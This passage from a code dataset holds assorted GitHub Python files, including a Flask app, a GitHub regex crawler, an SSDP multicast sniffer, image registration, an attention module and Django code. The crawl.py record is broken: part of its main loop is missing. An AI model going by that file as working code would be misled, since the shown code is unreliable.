helpers.py\n","repo_name":"yonedahayato/BayesianOptimization_WithTF","sub_path":"execute.py","file_name":"execute.py","file_ext":"py","file_size_in_byte":3857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"974029003","text":"from flask import Flask\n\nfrom models import db\nfrom routes.routesFront import routes\nfrom routes.routesApi import apiRoutes\nimport os\n\n\n# we use sqlalchemy and sqlite since it's easier to configure\n\n\n# we could use blueprints to separate the logic 
here but it's a simple small application\n# we create the data model that we will store\ndef create_app():\n    app = Flask(__name__)\n    app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0\n    app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///data.db'\n    db.init_app(app)\n    app.register_blueprint(routes)\n    app.register_blueprint(apiRoutes,url_prefix='/api')\n    return app\n\n\ndef setup_database(app):\n    with app.app_context():\n        db.create_all()\n        db.session.commit()\n\n\n\nif __name__ == '__main__':\n    app = create_app()\n    if not os.path.isfile('data.db'):\n        setup_database(app)\n    app.run()\n","repo_name":"Anas02200/SsenseAiTask","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"41552504154","text":"from pathlib import Path\nimport requests\nfrom urllib.parse import quote\nimport json\nimport re\nfrom reanalogy import data_path\n\nimport pandas as pd\n\nimport joblib\nimport time\n\nDF_FILE_NAME = \"crawled_regex.pk\"\nAPI_TOKEN = \"xxxxx\"\n\n\nmem = joblib.Memory(Path.home().joinpath(\".cache\"), verbose=0)\n\n\nSEARCH_TERM = [\n    \"re.compile\",\n    \"re.match\",\n    \"re.fullmatch\",\n    \"re.split\",\n    \"re.search\",\n    \"re.findall\",\n    \"re.finditer\",\n    \"re.sub\",\n    \"re.subn\",\n    \"re.escape\",\n    \"re.purge\",\n]\n\n\ndef init_df():\n    search_params = []\n\n    for q in SEARCH_TERM:\n        for i in range(1, 30):\n            search_params.append({\"q\": quote(q), \"page\": i, \"fragments\": None})\n    df = pd.DataFrame(search_params)\n\n    return df\n\n\ndef load_df(root_path: Path):\n    p = root_path.joinpath(DF_FILE_NAME)\n    if p.exists():\n        return pd.read_pickle(p)\n    else:\n        df = init_df()\n        save_df(root_path, df)\n        return df\n\n\ndef save_df(root_path: Path, df: pd.DataFrame):\n    df.to_pickle(root_path.joinpath(DF_FILE_NAME))\n\n\ndef parse_fragments(q, fragments):\n    patterns = []\n    if fragments is None:\n        return None\n    for delimiter in ['\"', \"'\", '\"\"\"']:\n        for f in re.findall(\n            f\"{q}\\(r*{delimiter}[^{delimiter}]*{delimiter} *[,\\)a-zA-Z\\\"']\", fragments\n        ):\n            # regex_dataset.append(f)\n            try:\n                raw_regex = re.sub(f\"{q}\\(r*{delimiter}\", \"\", f[: -len(delimiter) - 1])\n                re.compile(raw_regex)\n                patterns.append(raw_regex)\n            except Exception as e:\n                # print(f\"error: {f} -> {raw_regex}\")\n                print(e)\n    if len(patterns):\n\n        return patterns\n    else:\n        return None\n\n\n\ndef make_regex_dataset(root_path: Path):\n\n    headers = {\n        \"Accept\": \"application/vnd.github.text-match+json\",\n        \"Authorization\": f\"Bearer {API_TOKEN}\",\n        \"X-GitHub-Api-Version\": \"2022-11-28\",\n    }\n    df = None\n    while df is None or df.fragments.apply(lambda x: x is not 
None).mean()\n print(f\"progress: {currently_done:.2f}\")\n time.sleep(60)\n continue\n fragments = [\n match[\"fragment\"]\n for item in json.loads(response.text)[\"items\"]\n for match in item[\"text_matches\"]\n ]\n df.loc[row.Index, \"fragments\"] = str(fragments)\n save_df(root_path, df)\n return df\n\n\nif __name__ == \"__main__\":\n make_regex_dataset(data_path)\n","repo_name":"fostiropoulos/ReAnalogy","sub_path":"reanalogy/curation/crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":3626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30639532054","text":"from http import HTTPStatus\nfrom sqlalchemy.sql import case, func, or_\nfrom sqlalchemy.orm import aliased\nfrom typing import List, Optional, Tuple\nfrom traceback import format_exc\n\nfrom eproc import error_logger\nfrom eproc.models.auth.users_roles import UserRole\nfrom eproc.models.companies.branches import Branch\nfrom eproc.models.companies.departments import Department\nfrom eproc.models.companies.directorates import Directorate\nfrom eproc.models.companies.divisions import Division\nfrom eproc.models.users.employees import Employee\nfrom eproc.schemas.users.employees import (\n EmployeeAutoSchema,\n EmployeeDetailSchema,\n)\n\n\nclass EmployeeController:\n def __init__(self):\n self.schema = EmployeeAutoSchema()\n self.many_schema = EmployeeAutoSchema(many=True)\n self.detail_schema = EmployeeDetailSchema()\n \n def get_detail(self, id: str) -> Tuple[HTTPStatus, str, Optional[dict]]:\n try:\n FirstApprover = aliased(Employee)\n SecondApprover = aliased(Employee)\n ThirdApprover = aliased(Employee)\n\n is_registered = (\n case(\n (func.count(UserRole.role_id) > 0, True),\n else_=False\n ).label(\"is_registered\")\n )\n\n employee: Employee = (\n Employee.query\n .with_entities(\n Employee.id,\n Employee.full_name,\n Employee.email,\n Employee.phone_number,\n Employee.branch_id,\n Branch.description.label(\"branch_name\"),\n Employee.directorate_id,\n Directorate.description.label(\"directorate_name\"),\n Employee.division_id,\n Division.description.label(\"division_name\"),\n Employee.department_id,\n Department.description.label(\"department_name\"),\n FirstApprover.id.label(\"first_approver_id\"),\n FirstApprover.full_name.label(\"first_approver_full_name\"),\n FirstApprover.is_active.label(\"first_approver_is_active\"),\n SecondApprover.id.label(\"second_approver_id\"),\n SecondApprover.full_name.label(\"second_approver_full_name\"),\n SecondApprover.is_active.label(\"second_approver_is_active\"),\n ThirdApprover.id.label(\"third_approver_id\"),\n ThirdApprover.full_name.label(\"third_approver_full_name\"),\n ThirdApprover.is_active.label(\"third_approver_is_active\"),\n Employee.is_active,\n Employee.updated_at,\n Employee.updated_by,\n is_registered,\n )\n .outerjoin(FirstApprover, FirstApprover.id == Employee.first_approver_id)\n .outerjoin(SecondApprover, SecondApprover.id == Employee.second_approver_id) # TODO: FIX - if second_approver is null, then 404\n .outerjoin(ThirdApprover, ThirdApprover.id == Employee.third_approver_id)\n .join(Branch, Branch.id == Employee.branch_id)\n .join(Directorate, Directorate.id == Employee.directorate_id)\n .join(Division, Division.id == Employee.division_id)\n .join(Department, Department.id == Employee.department_id)\n .outerjoin(UserRole, UserRole.user_id == Employee.id)\n .filter(Employee.id == id)\n .filter(Employee.is_deleted.is_(False))\n .group_by(\n Employee.id,\n Branch.description,\n 
Directorate.description,\n                    Division.description,\n                    Department.description,\n                    FirstApprover.id,\n                    FirstApprover.full_name,\n                    FirstApprover.is_active,\n                    SecondApprover.id,\n                    SecondApprover.full_name,\n                    SecondApprover.is_active,\n                    ThirdApprover.id,\n                    ThirdApprover.full_name,\n                    ThirdApprover.is_active,\n                )\n                .first()\n            )\n            \n            if not employee:\n                return (\n                    HTTPStatus.NOT_FOUND,\n                    \"Employee not found.\",\n                    None\n                )\n\n            employee_data = self.detail_schema.dump(employee)\n\n            return HTTPStatus.OK, \"Employee found.\", employee_data\n        except Exception as e:\n            error_logger.error(f\"Error on EmployeeController:get_detail() :: {e}, {format_exc()}\")\n            return (\n                HTTPStatus.INTERNAL_SERVER_ERROR,\n                \"Failed to retrieve employee data.\",\n                None\n            )\n\n    def get_list(\n        self,\n        **kwargs\n    ) -> Tuple[HTTPStatus, str, List[Optional[dict]], int]:\n\n        id_list: List[str] = kwargs.get(\"id_list\")\n        entity_id: str = kwargs.get(\"entity_id\")\n        search_query: str = kwargs.get(\"search_query\").strip()\n        limit: Optional[int] = kwargs.get(\"limit\")\n        offset: int = kwargs.get(\"offset\")\n\n        FirstApprover = aliased(Employee)\n\n        employee_query = (\n            Employee.query\n            .with_entities(\n                Employee.id,\n                Employee.full_name,\n                Employee.email,\n                FirstApprover.full_name.label(\"first_approver_full_name\"),\n                Employee.is_active,\n                Employee.updated_at,\n                Employee.updated_by,\n            )\n            .join(FirstApprover, FirstApprover.id == Employee.first_approver_id)\n            .filter(Employee.is_deleted.is_(False))\n        )\n\n        if id_list:\n            employee_query = employee_query.filter(Employee.id.in_(id_list))\n        \n        if entity_id:\n            employee_query = employee_query.filter(Employee.entity_id == entity_id)\n        \n        if search_query:\n            employee_query = (\n                employee_query\n                .filter(or_(\n                    Employee.id.ilike(f\"%{search_query}%\"),\n                    Employee.full_name.ilike(f\"%{search_query}%\"),\n                ))\n            )\n        \n        total = employee_query.count()\n        \n        if limit:\n            employee_query = employee_query.limit(limit)\n\n        if offset > 0:\n            employee_query = employee_query.offset(offset)\n        \n        employee_list: List[Employee] = employee_query.all()\n\n        if not employee_list:\n            return (\n                HTTPStatus.NOT_FOUND,\n                \"Employee not found.\",\n                [],\n                total\n            )\n        employee_data_list = self.many_schema.dump(employee_list)\n\n        return (\n            HTTPStatus.OK,\n            \"Employee found.\",\n            employee_data_list,\n            total\n        )\n","repo_name":"keyinvoker/svc-procurement","sub_path":"eproc/controllers/employee.py","file_name":"employee.py","file_ext":"py","file_size_in_byte":7011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"16728070557","text":"# SSDP passive Sniffer\n# scans the LAN for SSDP notify packets and shows the information\n# in a Tree (it will show Location , Devices , Services)\n#\n# it does not need root privileges to run\n#\n# Created by Fabian (Islidius)\n#\n# TODO:\n# - Scroll Pane\n# - making the parser safe\n\n\nimport socket,struct\nfrom thread import start_new_thread,allocate_lock\nfrom Tkinter import *\nimport ttk\n\nMCAST_GRP = '239.255.255.250'\nMCAST_PORT = 1900\n\nrecord = {}\ntrec = {}\n\nrunning = True\nrunninglock = allocate_lock()\n\ndef parseFields(lines,out): # making key value pairs\n    for l in lines:\n        if not l == \"\":\n            if l.count(\":\") >= 1:\n                com,arg = l.split(\":\",1)\n                out[1][com.lower()] = arg.lstrip()\n\ndef parsePacket(s): # parse a complete packet\n    lines = s.split(\"\\n\")\n    if lines[0].startswith(\"M-SEARCH\"):\n        out = (\"search\",{})\n    elif lines[0].startswith(\"NOTIFY\"):\n        out = (\"notify\",{})\n    else: # make sure out is always defined (e.g. for stray HTTP responses)\n        out = (\"unknown\",{})\n\n    
parseFields(lines[1:],out)\n \n return out\n\n\ndef parseNTurn(urn):\n diff = urn.split(\":\")\n return (\"urn\",diff[len(diff) - 3],diff[len(diff) - 2])\n\ndef parseNTuuid(uuid):\n diff = uuid.split(\":\")\n return (\"uuid\",diff[len(diff) - 2],diff[len(diff) - 1])\n\ndef parseNTupnp(upnp):\n return (\"upnp\",\"rootdevice\")\n\ndef parseNT(nt): # parse the NT field\n if nt.startswith(\"urn\"):\n return parseNTurn(nt)\n elif nt.startswith(\"uuid\"):\n return parseNTuuid(nt)\n elif nt.startswith(\"upnp\"):\n return parseNTupnp(nt)\n else:\n return \"FAIL\"\n\ndef getuuid(packet): # extract uuid form usn\n return packet[1][\"usn\"].split(\":\")[1].rstrip()\n\n\ndef listen(): # listen and add to tree\n global record,runninglock\n while True:\n s = sock.recv(10240)\n packet = parsePacket(s)\n if packet[0] == \"notify\": # only parse notify packets\n uuid = getuuid(packet)\n if not uuid in record.keys(): # first time this uuid\n record[uuid] = {} # needed for further features\n record[uuid][\"device\"] = [] \n record[uuid][\"service\"] = []\n record[uuid][\"location\"] = packet[1][\"location\"]\n\n i = tree.insert(\"\",\"end\",text = uuid) # build the tree\n tree.insert(i,\"end\",text = \"Location: \" + packet[1][\"location\"])\n d = tree.insert(i,\"end\",text = \"device\")\n s = tree.insert(i,\"end\",text = \"service\")\n\n trec[uuid] = {} # safe link to the tree\n trec[uuid][\"device\"] = d\n trec[uuid][\"service\"] = s\n \n nt = parseNT(packet[1][\"nt\"])\n\n if nt[0] == \"urn\": # only parse urn\n if not nt[2] in record[uuid][nt[1]]: # eliminate doubles\n tree.insert(trec[uuid][nt[1]],\"end\",text = nt[2])\n record[uuid][nt[1]].append(nt[2])\n\n runninglock.acquire()\n if(not running): # check if closed\n break\n runninglock.release()\n \n runninglock.release()\n\n \ndef render(): # update loop\n tree.update()\n\n root.after(100,render)\n\ndef onClose(): #close window and thread\n global running,runninglock\n runninglock.acquire()\n running = False\n runninglock.release()\n root.destroy()\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\nsock.bind(('', MCAST_PORT))\n\nmreq = struct.pack(\"4sl\", socket.inet_aton(MCAST_GRP), socket.INADDR_ANY)\nsock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)\n\nroot = Tk()\nroot.wm_title(\"SSDP sniffer\")\nroot.protocol(\"WM_DELETE_WINDOW\",onClose)\n\ntree = ttk.Treeview()\ntree.pack(expand = True,fill = \"both\")\n\nstart_new_thread(listen,()) # start listen thread\nrender() # start update loop\n\nmainloop()\n","repo_name":"Islidius/pyNetworkTools","sub_path":"ssdp_sniffer.pyw","file_name":"ssdp_sniffer.pyw","file_ext":"pyw","file_size_in_byte":3748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5623032397","text":"from typing import Callable, Hashable\n\nimport numpy as np\nfrom skimage import morphology\nfrom pystackreg import StackReg\nfrom skimage.filters import sobel\nimport largestinteriorrectangle as lir\n\nfrom improc.experiment.types import Axis, Exposure, Image, MemoryImage, Timepoint, Vertex\nfrom improc.processes.types import ManyToOneTask, TaskError\n\nclass BadImageCantCrop(TaskError):\n ...\n\nclass Stack(ManyToOneTask):\n\n def __init__(self, registration_transform: Callable[[np.ndarray], np.ndarray] = sobel, register: bool = True, crop_output: bool = True, force_bad_reg: bool = False) -> None: # type: ignore\n super().__init__(\"stacked\", parallelism=1)\n self.crop_output = crop_output\n self.registration_transform = 
registration_transform\n        self.force_bad_reg = force_bad_reg\n        self.register = register\n\n    def group_pred(self, image: Image) -> Hashable:\n        return (image.get_tag(Vertex), image.get_tag(Exposure))\n\n    def transform(self, images: list[Image]) -> Image:\n        ordered = np.array([img.data for img in sorted(images, key=lambda x: x.get_tag(Timepoint).index)]) # type: ignore\n        tags = list(filter(lambda x: not isinstance(x, Timepoint), images[0].tags))\n        axes = [Axis.T] + images[0].axes\n        if not self.register:\n            return MemoryImage(ordered, axes, tags)\n\n        sr = StackReg(StackReg.RIGID_BODY)\n        reg_stack = np.array([self.registration_transform(img) for img in ordered])\n\n        time_axis = sr._detect_time_axis(reg_stack)\n        if time_axis != 0 and not self.force_bad_reg: # If the registration is gonna be garbage, don't bother\n            print(f\"Bad registration for {images[0].vertex}; defaulting to stack w/o registration\")\n            return MemoryImage(ordered, axes, tags)\n\n        transforms = sr.register_stack(reg_stack, reference=\"previous\")\n        stacked = sr.transform_stack(np.array(ordered), tmats=transforms)\n        if self.crop_output:\n            try:\n                stacked = crop(stacked)\n            except Exception as err:\n                # use the dedicated error type and keep the original traceback\n                raise BadImageCantCrop(f\"Can't crop image: {images[0]}\") from err\n        return MemoryImage(stacked, axes, tags)\n\ndef crop(stack: np.ndarray) -> np.ndarray:\n\n    min_poly = np.prod(stack != 0, axis=0)\n    x1,y1,x2,y2 = lir.lir(min_poly.astype(bool))\n\n    return stack[:, y1:y2, x1:x2]\n\ndef composite_stack(stacks: np.ndarray, tmats: np.ndarray) -> np.ndarray | None:\n    assert stacks.ndim == 4\n\n    sr = StackReg(StackReg.RIGID_BODY)\n    stacked_cropped = np.array([crop(sr.transform_stack(stack, tmats=tmats)) for stack in stacks])\n    return stacked_cropped\n","repo_name":"Barmada-Lab/lab-tools","sub_path":"improc/improc/processes/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"12037226974","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport Apps.Perfil.models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('Perfil', '0001_initial'),\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='UserConfig',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('plantilla', models.IntegerField(default=1, choices=[(1, b'Predeterminado'), (2, b'Clasico')])),\n            ],\n        ),\n        migrations.AlterField(\n            model_name='userprofile',\n            name='avatar',\n            field=models.ImageField(upload_to=Apps.Perfil.models.url),\n        ),\n        migrations.AlterField(\n            model_name='userprofile',\n            name='user',\n            field=models.OneToOneField(related_name='profile', on_delete=models.CASCADE, to=settings.AUTH_USER_MODEL),\n        ),\n        migrations.AddField(\n            model_name='userprofile',\n            name='config',\n            field=models.OneToOneField(null=True, on_delete=models.CASCADE, to='Perfil.UserConfig'),\n        ),\n    ]\n","repo_name":"Ezla/PVenta","sub_path":"Apps/Perfil/migrations/0002_auto_20151110_1438.py","file_name":"0002_auto_20151110_1438.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"35696898705","text":"from matplotlib.pyplot import boxplot\nfrom utils.functions import box_xyxy_to_cxcywh, uniform_shape_masks\nfrom matplotlib import patches\nfrom utils import config\n\ndef visualize(f, axes_images, axes_masks, axes_pred, 
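# note (added comment): each axes_* argument is one row of subplot axes, one axis per batch element\n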
axes_target_masks, predicted, inputs, targets):\n\n    class_predictions = predicted['class_predictions'].cpu().detach()\n    bbox_predictions = predicted['bbox_predictions'].cpu().detach()\n    segmentation_masks = predicted['segmentation_masks'].cpu().detach()\n\n    batch_tensor_bhwc = inputs.rearrange(\"bs c h w -> bs h w c\")\n\n    for im, ax, target in zip(batch_tensor_bhwc.data, axes_images, targets):\n        im = im - im.min()\n        im /= im.max()\n        # im *= 255\n        # print(im.min(), im.max())\n        ax.set_xlim(0, im.shape[1])\n        ax.set_ylim(im.shape[0], 0 )\n        ax.imshow(im, origin=\"upper\")\n        ax.set_title(\"id: {}\".format(target['image_id'].item()))\n\n    for im, ax, class_probs, boxes, target in zip(batch_tensor_bhwc.data, axes_images, class_predictions, bbox_predictions, targets):\n        cids = class_probs.argmax(-1)\n        h, w = target['size']\n        for cid, box in zip(cids, boxes):\n            if cid != config.NIL_CLASS_ID:\n                box[0::2] *= w\n                box[1::2] *= h\n                draw_box(ax, box, edgecolor='C{}'.format(cid), text='{}'.format(config.class_names[cid.item()]))\n\n    # draw the padding masks only when both the axes row and the masks exist\n    if axes_masks is not None and batch_tensor_bhwc.mask is not None:\n        for mask, ax in zip(batch_tensor_bhwc.mask, axes_masks):\n            ax.imshow(mask.float().squeeze(-1))\n\n    for mask, ax in zip(segmentation_masks.detach(), axes_pred):\n        ax.imshow(mask[0:3].permute(1,2,0))\n\n    target_masks = uniform_shape_masks([t['masks'] for t in targets]).float()\n    target_masks_count = [t['masks'].shape[0] for t in targets]\n\n    for meta, t_masks, t_count, ax in zip(targets, target_masks, target_masks_count, axes_target_masks):\n        if t_masks.numel() != 0:\n            legend_handels = []\n            if t_count >= 3:\n                ax.imshow(t_masks[0:3].permute(1,2,0))\n                label = meta['labels'][0].item()\n                cid = config.class_labels_to_ids[label]\n                c_name = config.class_names[cid]\n                legend_handels.append(patches.Patch(color='red', label=\"label: {}, id: {}, {}\".format(label, cid, c_name)))\n\n                label = meta['labels'][1].item()\n                cid = config.class_labels_to_ids[label]\n                c_name = config.class_names[cid]\n                legend_handels.append(patches.Patch(color='green', label=\"label: {}, id: {}, {}\".format(label, cid, c_name)))\n\n                label = meta['labels'][2].item()\n                cid = config.class_labels_to_ids[label]\n                c_name = config.class_names[cid]\n                legend_handels.append(patches.Patch(color='blue', label=\"label: {}, id: {}, {}\".format(label, cid, c_name)))\n            if t_count == 1:\n                ax.imshow(t_masks[0:1].permute(1,2,0))\n\n                label = meta['labels'][0].item()\n                cid = config.class_labels_to_ids[label]\n                c_name = config.class_names[cid]\n                legend_handels.append(patches.Patch(color='red', label=\"label: {}, id: {}, {}\".format(label, cid, c_name)))\n\n            ax.legend(handles=legend_handels, prop={'size': 6})\n\n\n    f.suptitle(\"epoch:{}\\nbs: {}, height: {},\\n width: {}, channels: {}\".format(config.epoch, *batch_tensor_bhwc.shape));\n\n    return f\n\n\ndef draw_box(ax, box, linewidth=1, edgecolor='b', facecolor='none', text=None, label=None, **kwargs):\n    cx,cy,w,h = box.unbind(-1)\n    anchor_point = (cx-w/2, cy-h/2)\n    rect = patches.Rectangle(anchor_point, w, h, linewidth=linewidth, edgecolor=edgecolor, facecolor=facecolor, label=label, **kwargs)\n    ax.add_patch(rect)\n    if text is not None:\n        ax.text(cx, cy, text, color=edgecolor, bbox=dict(boxstyle=\"square\", fc=(0., 0., 0., 0.6), ec=(1., 1., 1., 0.0)))\n    ax.scatter(cx, cy, c=edgecolor, 
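# note (added comment): center dot marks (cx, cy); its marker size reuses the box linewidth value\n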
s=linewidth)","repo_name":"protsenkovi/diydetr","sub_path":"utils/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":3695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"73453418435","text":"# # To find out the last digit:\n# numero = 1235654\n\n# letras = str(numero)\n# print(letras)\n\n# longitud = len(letras)\n# print(longitud)\n\n# ultimo = letras[-1]\n# primero = letras[0]\n# print(ultimo)\n# print(primero)\n\n# print (ultimo == \"4\")\n# print (ultimo == \"8\")\n\n\n# lista = [2,5,8,9,6,1]\n# mayor = max(lista)\n# print(mayor in lista[2:3])\n\n# palabra = \"hola\"\n# lista = list(palabra)\n# print(lista)\n\n# palabra_nueva = str(lista)\n# print(palabra_nueva)\n\ndatos_tanque = {\n'codigoTanque': 'TA001',\n'sensor1':'estado',\n'sensor2':'estado',\n'sensor3':'estado'\n}\n\nprint(datos_tanque['codigoTanque'])\n\n# def num():\n#     try:\n#         if numero > 5:\n#             print(\"numero > 5\")\n#         else:\n#             print (\"numero < 5\")\n#     except:\n#         print(\"enter a number\")\n\n\n\n\n# temperatura_fahr = input('Enter Fahrenheit Temperature:')\n# try:\n#     fahr = float(temperatura_fahr)\n#     cel = (fahr - 32.0) * 5.0 / 9.0\n#     print(cel)\n# except:\n#     print('Please enter a number')","repo_name":"isabelyb/Python_MinTIC_2021","sub_path":"week_2/pruebas.py","file_name":"pruebas.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"14958693473","text":"\"\"\"\nGiven a non-empty array of integers nums, every element appears twice except for one. Find that single one.\n\nYou must implement a solution with a linear runtime complexity and use only constant extra space.\n\nExample 1:\n\nInput: nums = [2,2,1]\nOutput: 1\nExample 2:\n\nInput: nums = [4,1,2,1,2]\nOutput: 4\n\nExample 3:\n\nInput: nums = [1]\nOutput: 1\n\n\nConstraints:\n\n1 <= nums.length <= 3 * 10^4\n-3 * 10^4 <= nums[i] <= 3 * 10^4\nEach element in the array appears twice except for one element which appears only once.\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n    @staticmethod\n    def singleNumber(nums: List[int]) -> int:\n        nums.sort()\n        # note: sorting is O(n log n); XOR-ing all elements would meet the stated O(n) bound\n        print(nums)\n        position = 0\n        while True:\n            if position + 1 < len(nums) and nums[position] == nums[position + 1]:\n                position += 2\n            else:\n                return nums[position]\n\n\nsolution = Solution()\nprint(solution.singleNumber([1, 2, 3, 2, 1]))\n","repo_name":"ImSakunthala/leetcode","sub_path":"Beginner_level/Array/single_number.py","file_name":"single_number.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"24573321128","text":"import torch\r\nimport pickle\r\nimport torch.nn as nn\r\n\r\n\r\nclass Attention(nn.Module):\r\n    \"\"\" Applies attention mechanism on the `context` using the `query`.\r\n\r\n    **Thank you** to IBM for their initial implementation of :class:`Attention`. 
Here is\r\n their `License\r\n `__.\r\n\r\n Args:\r\n dimensions (int): Dimensionality of the query and context.\r\n attention_type (str, optional): How to compute the attention score:\r\n\r\n * dot: :math:`score(H_j,q) = H_j^T q`\r\n * general: :math:`score(H_j, q) = H_j^T W_a q`\r\n\r\n Example:\r\n\r\n >>> attention = Attention(256)\r\n >>> query = torch.randn(5, 1, 256)\r\n >>> context = torch.randn(5, 5, 256)\r\n >>> output, weights = attention(query, context)\r\n >>> output.size()\r\n torch.Size([5, 1, 256])\r\n >>> weights.size()\r\n torch.Size([5, 1, 5])\r\n \"\"\"\r\n\r\n def __init__(self, dimensions, attention_type='general'):\r\n super(Attention, self).__init__()\r\n\r\n if attention_type not in ['dot', 'general']:\r\n raise ValueError('Invalid attention type selected.')\r\n\r\n self.attention_type = attention_type\r\n if self.attention_type == 'general':\r\n self.linear_in = nn.Linear(dimensions, dimensions, bias=False)\r\n\r\n self.linear_out = nn.Linear(dimensions * 2, dimensions, bias=False)\r\n self.softmax = nn.Softmax(dim=-1)\r\n self.tanh = nn.Tanh()\r\n\r\n def forward(self, query, context):\r\n \"\"\"\r\n Args:\r\n query (:class:`torch.FloatTensor` [batch size, output length, dimensions]): Sequence of\r\n queries to query the context.\r\n context (:class:`torch.FloatTensor` [batch size, query length, dimensions]): Data\r\n overwhich to apply the attention mechanism.\r\n\r\n Returns:\r\n :class:`tuple` with `output` and `weights`:\r\n * **output** (:class:`torch.LongTensor` [batch size, output length, dimensions]):\r\n Tensor containing the attended features.\r\n * **weights** (:class:`torch.FloatTensor` [batch size, output length, query length]):\r\n Tensor containing attention weights.\r\n \"\"\"\r\n batch_size, output_len, dimensions = query.size()\r\n query_len = context.size(1)\r\n\r\n if self.attention_type == \"general\":\r\n query = query.view(batch_size * output_len, dimensions)\r\n query = self.linear_in(query)\r\n query = query.view(batch_size, output_len, dimensions)\r\n\r\n # TODO: Include mask on PADDING_INDEX?\r\n\r\n # (batch_size, output_len, dimensions) * (batch_size, query_len, dimensions) ->\r\n # (batch_size, output_len, query_len)\r\n attention_scores = torch.bmm(query, context.transpose(1, 2).contiguous())\r\n\r\n # Compute weights across every context sequence\r\n attention_scores = attention_scores.view(batch_size * output_len, query_len)\r\n attention_weights = self.softmax(attention_scores)\r\n attention_weights = attention_weights.view(batch_size, output_len, query_len)\r\n\r\n # (batch_size, output_len, query_len) * (batch_size, query_len, dimensions) ->\r\n # (batch_size, output_len, dimensions)\r\n output = torch.mul(attention_weights.transpose(1, 2), context)\r\n\r\n return output, attention_weights\r\n\r\n\r\n# open\r\nwith open('./representation/row_representation.pickle', 'rb') as handle:\r\n row_representation = pickle.load(handle)\r\nwith open('./representation/col_representation.pickle', 'rb') as handle:\r\n col_representation = pickle.load(handle)\r\nwith open('./representation/grid_representation.pickle', 'rb') as handle:\r\n grid_representation = pickle.load(handle)\r\nwith open('./representation/tcq_representation.pickle', 'rb') as handle:\r\n table_context_question_representation = pickle.load(handle)\r\n\r\nattention_calc = Attention(768, attention_type='dot')\r\nattention_calc.to('cuda:0')\r\n\r\nweighted_row_representation = []\r\nweighted_col_representation = []\r\nweighted_grid_representation = []\r\n\r\nfor idx in 
range(len(row_representation)):\r\n weighted_row_rep, _ = attention_calc(table_context_question_representation[idx].unsqueeze(dim=0),\r\n row_representation[idx].to('cuda:0').unsqueeze(dim=0))\r\n weighted_row_representation.append(weighted_row_rep)\r\n\r\nfor idx in range(len(col_representation)):\r\n weighted_col_rep, _ = attention_calc(table_context_question_representation[idx].unsqueeze(dim=0),\r\n col_representation[idx].unsqueeze(dim=0))\r\n weighted_col_representation.append(weighted_col_rep)\r\n\r\nfor idx in range(len(grid_representation)):\r\n for j in range(len(grid_representation[idx]) - 1):\r\n grid_tensor_in_grid = grid_representation[idx][j][0]\r\n for i in range(len(grid_representation[idx][0]) - 1):\r\n temp = grid_representation[idx][j][i + 1].clone().detach()\r\n grid_tensor_in_grid = torch.cat((temp, grid_tensor_in_grid), dim=-2)\r\n if j == 0:\r\n grid_tensor_pre_attention = grid_tensor_in_grid.unsqueeze(dim=0)\r\n grid_tensor_pre_attention = torch.cat((grid_tensor_in_grid.unsqueeze(dim=0), grid_tensor_pre_attention), dim=0)\r\n grid_tensor_pre_attention = torch.reshape(grid_tensor_pre_attention,\r\n [len(grid_representation[idx]) * len(grid_representation[idx][0]), 768])\r\n\r\n weighted_grid_rep, _ = attention_calc(table_context_question_representation[idx].unsqueeze(dim=0),\r\n grid_tensor_pre_attention.unsqueeze(dim=0))\r\n\r\n weighted_grid_representation.append(weighted_grid_rep)\r\n\r\nwith open('./weighted_representation/weighted_col_representation.pickle', 'wb') as handle:\r\n pickle.dump(weighted_col_representation, handle)\r\n\r\nwith open('./weighted_representation/weighted_row_representation.pickle', 'wb') as handle:\r\n pickle.dump(weighted_row_representation, handle)\r\n\r\nwith open('./weighted_representation/weighted_grid_representation.pickle', 'wb') as handle:\r\n pickle.dump(weighted_grid_representation, handle)\r\n","repo_name":"KevinCL16/FeTaQA-Experiment-Preprocess","sub_path":"attention.py","file_name":"attention.py","file_ext":"py","file_size_in_byte":6207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18188945068","text":"# Create your views here.\nfrom check.serializers import DataSerializer, ResultSerializer, ItemsStateSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nimport json\nfrom datetime import datetime\nimport tzlocal\nfrom sklearn.preprocessing import LabelEncoder\nimport numpy as np\nimport pandas as pd\nimport pickle\nfrom TestAPI.settings import BASE_DIR\nfrom collections import defaultdict\nimport os\nimport operator\nfrom django.http import JsonResponse\nfrom django.db import 